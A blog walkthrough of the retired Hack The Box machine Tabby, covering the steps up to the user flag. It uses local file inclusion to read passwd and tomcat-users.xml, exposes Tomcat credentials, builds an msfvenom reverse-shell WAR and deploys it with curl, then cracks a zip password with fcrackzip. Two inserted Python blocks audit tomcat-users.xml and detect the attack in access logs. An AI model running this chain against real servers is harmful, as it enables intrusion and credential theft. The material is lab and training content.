User flag for Tabby — HTB

SecHaq
6 min read, Nov 9, 2020

This is my write up for how I got the user flag for Tabby.

The plan was to get the root flag as well, but I did not check which machine HTB was retiring the week I did Tabby, and by the time I noticed it had already been retired.

Reconnaissance

Nmap

So as is the way, I get nmap to get the ball rolling with the following command:
nmap -sV -sC -oA nmap/tabby 10.10.10.194 -v

Thanks to Ippsec for the above command, but let's break it down.
From the nmap help pages:
-sV: Probe open ports to determine service/version info
-sC: Script scanning. NSE scripts commonly perform tasks such as detecting service vulnerabilities, malware discovery, collecting more information from databases and other network services, and advanced version detection. NSE is not executed unless you request it with options such as --script or -sC.
-oA <basename>: Output in the three major formats at once
-v: Increase the verbosity level; open ports are displayed on the terminal as soon as they are found.

Great, we see 3 open ports. 22 for ssh which is used for remote access via a secure shell.
80 for HTTP to access the Apache webserver. This is not secure, meaning the data is sent in plain text. We can see it is running an Apache webserver so most likely it is only serving static content.
And port 8080 which is running Apache Tomcat. Now Tomcat is used to run Java code, this is an important note for later.

Ok, before I move on to investigating the webpage on port 80, I like to have some recon tools running in the background.
Normally I run nmap to scan for UDP ports, for example:
nmap -sUV <IP> -v

and I like to run gobuster, for example:
gobuster dir -u http://10.10.10.194:8080/ -w /usr/share/wordlists/dirb/common.txt

but for this box they did not, in my view, produce anything groundbreaking toward the root flag, so to keep it simple I won't include those commands and their results.

The website

Now we go to the website, we’ll go to port 80 first — http://10.10.10.194

After looking around nothing really grabs my attention except for:

So we take note and come back to it later. Sometimes after poking around a website and its service we can determine how we could use this to our advantage.
Next up, port 8080:

So reading the above web page, I get a strong inclination that, using the URL we found earlier on the port 80 website, we may have to do a Local File Inclusion (LFI).

LFI

So a quick check using the following tool: https://github.com/sUbc0ol/LFI-scanner

python ./lfiscan.py --url="http://megahosting.htb/news.php?file=statement"

We find that the URL is vulnerable to a LFI:

Great, let's run this through Burp's proxy and see what we get.
I intercept the request via Burp Proxy, send it over to the Repeater tool and send the request:

We have access to the passwd file.
I do a quick search for “sh” to see which account has access to a shell and the most notable account is “ash”.

Ok, returning to the Tomcat page (on port 8080), we can see some file paths on the web page. The one we want to play around with is: /etc/tomcat9/tomcat-users.xml

So I had to play around with the file path to get the tomcat-users.xml file. All the information is on the Tomcat web page, but I did have to do some Googling to understand the path convention. Alternatively, I could have installed Apache Tomcat on my own machine and run it locally; that would have been better from a learning perspective.

In the response, we can see a username and password — tomcat:$3cureP4s5w0rd123!

On the Tomcat page, there is a URL to the admin panel, which requires a username and password...
Once logged in you’re taken to the host manager webpage.
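The reason this step works is that tomcat-users.xml was readable through the LFI and the account it contains holds deployment-capable roles. As an added example (not from the write-up), here is a small Python audit of such a file: it lists every account holding a role that permits deployment or host administration, flags accounts that mix the browser (GUI) roles with the text/script roles, and checks whether a file mode would let other users on the box read the file. The sample XML, its usernames and its passwords are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Roles that let a holder deploy applications or administer virtual hosts
# (role names from the Tomcat manager and host-manager HOWTOs).
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}
GUI_ROLES = {"manager-gui", "admin-gui"}
SCRIPT_ROLES = {"manager-script", "manager-jmx", "admin-script"}

# Constructed sample in the shape of /etc/tomcat9/tomcat-users.xml; the
# usernames and passwords are made up for this example.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="EXAMPLE-ONLY" roles="admin-gui,manager-script"/>
  <user username="monitor" password="EXAMPLE-ONLY" roles="manager-status"/>
</tomcat-users>
"""


def _local(tag):
    """Drop the XML namespace so tags match whether or not the file declares one."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return one finding per <user> that holds a deployment-capable role."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = sorted(roles & DEPLOY_ROLES)
        if not privileged:
            continue
        findings.append({
            "user": el.get("username") or el.get("name", ""),
            "privileged_roles": privileged,
            # Tomcat's docs advise against giving one account both the HTML
            # interface and the text/JMX interfaces, to limit CSRF exposure.
            "gui_and_script": bool(roles & GUI_ROLES) and bool(roles & SCRIPT_ROLES),
            # A password attribute in the clear is exactly what an LFI read exposes.
            "password_in_file": el.get("password") is not None,
        })
    return findings


def readable_by_others(mode):
    """True if a POSIX mode (e.g. os.stat(path).st_mode) grants group or world read."""
    return bool(mode & 0o044)


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
    print("mode 0640 readable by group/others:", readable_by_others(0o640))
```

On a live host the same check would read the file from disk and pass os.stat(path).st_mode to readable_by_others; the chain in this write-up depended on exactly that read access plus a deployment role on the recovered account.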

Ok, so here I got stuck, and it took some Googling and playing around to finally understand the next step. I made a note of the following websites, which led me to the answer:

https://www.certilience.fr/2019/03/tomcat-exploit-variant-host-manager/
https://tomcat.apache.org/tomcat-8.5-doc/host-manager-howto.html
https://stackoverflow.com/questions/14222215/tomcat-7-tomcat-users-manager-script-example-for-deploy

Long research cut short: you upload a .war file containing a reverse shell written in Java (remember Tomcat runs Java), start a local listener, then request the application you created when you uploaded the .war. That executes the reverse shell and your listener becomes a shell on the box.

Note: a .war file (Web Application Resource file) is a collection of files that make up a web application (https://en.wikipedia.org/wiki/WAR_(file_format)).
This is the format Tomcat accepts, which is how it can execute our reverse shell.

Getting a shell

From https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war

The above creates our .war file, which contains our reverse shell.

curl -u 'tomcat':'$3cureP4s5w0rd123!' -T shell.war http://10.10.10.194:8080/manager/text/deploy?path=/webapp

The above command uploads the shell.war file. "webapp" is just the name we give our deployed application.
Create our listener:
nc -lnvp 4444

Call our “webapp”:

curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/webapp/

This executes our reverse shell and pops a shell on our listener:
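Both the LFI probes earlier and the manager deployment just shown leave distinctive entries in the web server's access logs. As an added example, not part of the write-up, here is a Python detector that covers both passages: it parses common-format lines (Apache on port 80, Tomcat's AccessLogValve on 8080), flags traversal sequences or absolute sensitive paths in any query value after repeated URL-decoding (so double-encoded attempts are caught too), flags PUT/POST requests to the manager and host-manager applications, and then reports the requests that reach the context path named in a deploy call. The log lines are constructed for the example, and the sensitive-path prefixes and manager paths are my assumptions rather than anything from the page.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common/combined access-log prefix as written by Apache and by Tomcat's
# AccessLogValve; referer and user-agent fields, if present, are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
# Assumed prefixes worth alerting on when they appear verbatim in a parameter.
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/var/lib/tomcat", "/usr/share/tomcat")
# Assumed paths under which the manager applications accept write operations.
MANAGER_WRITE_PATHS = ("/manager/text/", "/manager/html/", "/host-manager/")

# Constructed log lines replaying the write-up's chain against a Tomcat/Apache host.
SAMPLE_LOG = [
    '10.10.14.7 - - [09/Nov/2020:10:01:02 +0000] "GET /news.php?file=statement HTTP/1.1" 200 3012',
    '10.10.14.7 - - [09/Nov/2020:10:01:09 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 1713',
    '10.10.14.7 - - [09/Nov/2020:10:01:15 +0000] "GET /news.php?file=..%252f..%252fetc/tomcat9/tomcat-users.xml HTTP/1.1" 200 1200',
    '10.10.14.7 - tomcat [09/Nov/2020:10:05:40 +0000] "PUT /manager/text/deploy?path=/webapp HTTP/1.1" 200 27',
    '10.10.14.7 - tomcat [09/Nov/2020:10:06:01 +0000] "GET /webapp/ HTTP/1.1" 200 0',
]


def _decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded traversal (%252e%252e) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line):
    """Return the request fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(lines):
    """Run the three checks over access-log lines and return alerts in log order."""
    alerts, deployed = [], []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        path = _decode(parts.path)
        query = parse_qsl(parts.query, keep_blank_values=True)
        base = {"ip": rec["ip"], "user": rec["user"], "target": rec["target"], "status": rec["status"]}

        # 1. Traversal sequences or absolute sensitive paths, in the URL path
        #    or in any query value, after full decoding.
        for candidate in [path] + [v for _, v in query]:
            decoded = _decode(candidate)
            if TRAVERSAL.search(decoded) or decoded.startswith(SENSITIVE_PREFIXES):
                alerts.append(dict(base, kind="lfi_attempt"))
                break

        # 2. Write requests to the manager or host-manager applications; the
        #    deploy target's context path is remembered for check 3.
        if rec["method"] in ("PUT", "POST") and path.startswith(MANAGER_WRITE_PATHS):
            alerts.append(dict(base, kind="manager_deploy"))
            ctx = dict(query).get("path")
            if ctx:
                deployed.append(ctx.rstrip("/") + "/")
        # 3. Any request that reaches a context deployed through the manager.
        elif any(path.startswith(ctx) for ctx in deployed):
            alerts.append(dict(base, kind="deployed_app_invoked"))
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert["kind"], alert["ip"], alert["user"], alert["target"])
```

Running it over the constructed lines produces two lfi_attempt alerts, one manager_deploy alert attributed to the tomcat account, and one deployed_app_invoked alert for the first hit on /webapp/. In practice the third check is the high-signal one: a new context deployed through the manager and requested within minutes by the same client is rarely normal administration.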

Great, and remember "ash", which means we already know which account to target next.

Getting the user flag

Poking around as tomcat, you find a backup, which is promising. We pull the backup locally and see what it contains:

nc -lvnp 2005 > backupHTML.zip
nc -w 4 <ip> 2005 < 16162020_backup.zip

The -w option sets the timeout for connects and final net reads (from the nc man page).

Once I have the backup file locally, I try to unzip it, but it is password protected. So I run it through fcrackzip:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt backupHTML.zip

and it does crack it; the password is: admin@it
We use the password to unzip the file and poke around the files... annnnnd I found nothing. The files contain nothing useful for me to use.

But in good old HTB fashion (and since I’ve run into this in the past) I try to ‘su’ into ash on the reverse shell I got….

and….

well…the user flag is yours for the taking.

Thanks all, hopefully, next time I’ll get root before it retires :)
